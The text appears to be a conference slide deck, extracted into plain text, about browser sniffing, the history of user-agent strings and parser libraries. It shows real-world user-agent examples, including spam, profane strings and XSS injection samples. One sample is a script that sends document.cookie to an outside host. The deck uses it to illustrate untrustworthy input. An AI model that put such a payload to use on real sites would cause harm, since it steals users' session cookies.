s e i l y d o b y er v e Niels Leenheer Niels Leenheer 30/09/2016

: g n i n war this talk is full of lies and deception

… s e y this talk is about browser sniffing

? y h w

browser sniffing is dirty

you should use feature detection

: s er op l e v e D b e W Dear d i p u t S s i g n i f f i n S er s Brow http://www.webstandards.org/2002/12/20/dear-web-developers-browser-sniffing-is-stupid/

y h W s on s a e 5R Br s k n i t S g n i f f i n S er ows https://www.sitepoint.com/why-browser-sniffing-stinks/

d a B s i on i t c e t e D er s Brow https://css-tricks.com/browser-detection-is-bad/

s e c i t c a r p t s e b responsive design progressive enhancement feature detection

n er tt a p i t n a browser sniffing

browser sniffing is just a tool

everybody uses browser sniffing

… t a h w is browser sniffing actually?

the http specification defines the user-agent header it contains a string with information about the browser

every request the browser makes to the server includes the user-agent header

GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net

GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net HTTP/1.1 200 OK Date: Mon, 08 Feb 2016 10:40:28 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT ETag: "984-50cae11796432" Accept-Ranges: bytes Content-Length: 2436 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <!doctype html> <html>

you can access the exact same string using javascript

<script type=“text/javascript"> <!-alert(navigator.userAgent); //--> </script>

you can use the user-agent string to identify: the browser the rendering engine the operating system the device model and more

… t a h w is browser sniffing good for?

knowledge

if you know the platform or browser, you can streamline the user experience

if you know your users, you can build a better site for them

if you know which browser is being used, you can work around bugs

if you know which browser is causing errors, you can fix them

privacy implications

changing your user agent string actually makes it easier to track you

anonymity by looking like everybody else

brave does not have a useragent string of its own

… y h w is browser sniffing so difficult?

things started out simple

Mosaic Mosaic/0.9 The name of the browser The version of the browser

Netscape Navigator Mozilla/1.0 (Win3.1) The code name of the browser The version of the browser Operating system

but it quickly started to get complicated

Internet Explorer Mozilla/1.0 (compatible; MSIE 1.0; Windows 95) The name of the browser Compatible with Netscape Navigator 1.0 The version of the browser Operating system

Opera Opera/8.54 (Windows 95; U; en) The name of the browser The version of the browser Operating system English language United States level encryption

Opera Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0 Rendering engine

Opera Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.0 Version/10.00 The name of the browser Fake version of the browser Real version of the browser

Firefox Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1) Gecko/20090624 Firefox/3.5 The name of the rendering engine Build date of the rendering engine The name of the browser Version of the browser Version of the rendering engine

Firefox Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Build date is no longer updated

Firefox Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0

and it gets worse…

Safari Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3 The name of the browser Version of the browser

Chrome Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3 The name of the browser Version of the browser

Opera Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180 The name of the browser Version of the browser

Internet Explorer Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Version of the browser

Edge Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162 The name of the browser Version of the browser

and those were all relatively normal user-agent strings

“User-Agent strings only get larger over time, never smaller” Niels’s law of User-Agent strings

sometimes browsers simply do not make sense at all

Samsung Internet Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/ 28.0.1500.94 Mobile Safari/537.36 Samsung device Version of the browser

Nokia Xpress for Windows Phone Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5

LG Netcast Mozilla/5.0 (X11; Linux; ko-KR) AppleWebKit/534.26+ (KHTML, like Gecko) Version/5.0 Safari/534.26+

sometimes browsers lie to hide their true identity

Opera Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser The name of the operating system Version of the browser

Opera Mobile (desktop mode) Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser ROT 13 encrypted “mobi“ Version of the browser

Internet Explorer Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Browser version

Internet Explorer (compatibility view) Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Trident 5 means it’s Internet Explorer 9

browsers can change the user-agent strings for individual websites

Mobile Internet Explorer 11 on Windows Phone 8.1 on html5test.com Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0; ARM; Touch; WPDesktop; Lumia 535)

Mobile Internet Explorer 11 on Windows Phone 8.1 Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 535) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537

sometimes browsers are just weird

Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]

Vehicle Center Console Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]

Mozilla/4.0 (MobilePhone PLS6600KJ/US/1.0) NetFront/3.1 MMP/2.0

Mozilla/4.08 (PDA; SL-C3000/1.0,Qtopia/1.5.2) NetFront/3.1

Mozilla/5.0 (DTV; TVwithVideoPlayer) NetFront/4.1 AQUOSBrowser/1.0 InettvBrowser/2.2 (08001F;DTV06VSFC;0009;0001)

Mozilla/5.0 (Standard; NF41SW/1.1; like Gecko; TASKalfa 406ci) NetFront/4.1

Mozilla/4.0 (PSP (PlayStation Portable); 2.60)

Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2

? Mozilla/5.0 (DAG; 1.4; like Gecko) NetFront/4.2

Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en] Opera Bork-edition?

BORK BORK BORK

and it is possible to change the user-agent string yourself

spam http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM, vibratori, falli, vagine, lubrificanti, dvd porno, film hard, lingerie - Migliaia di articoli nel nostro sexy shop online.; http://www.sexxlife.it; info@sexxlife.it)

XSS attacks

<script>alert("My Little Pony”);</script> <script language="JavaScript">document.location= "http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script> <img src="http://bravo.trollab.org/mylittlepony.png" alt="My Little Pony”>

XSS attacks

funny people (╯°□°)╯︵ ┻━┻ Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit) Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Surface Zune Phone XL) AppleWebKit/537.36 (KHTML, like Gecko)

funny people

angry people

angry people FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0 Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62 Seriously, Go fuck yourself W3C standards are important. Stop fucking obsessing over user-agent already.

4 x balls 82 x fuck 9 x dick 1.000.000 unique useragent strings 6 x ass 10 x shit 3 x vagina 108 x sex

user-agent strings cannot be trusted!

s e i l y d o b y er v e

er v e n d l ou h s you use browser sniffing for controlling access to your website

er v e n d l ou h s you use browser sniffing for determining browser capabilities

er v e n d l ou h s you build your own browser sniffing library

#1 use a browser sniffing library that is regularly updated

#2 check if it is possible to automatically schedule updates

try libraries like UAParser, PiwikDeviceDetector or WhichBrowser https://github.com/ua-parser https://github.com/piwik/device-detector https://github.com/whichbrowser

http://useragent.mkf.solutions https://github.com/ThaDafinser/UserAgentParserComparison

“If you tell a big enough lie and tell it frequently enough, it will be believed” — Ghandi

“If you tell a big enough lie and tell it frequently enough, it will be believed” — Ghandi

“If you tell a big enough lie and tell it frequently enough, it will be believed” — Adolf Hitler

thank you!

thank you!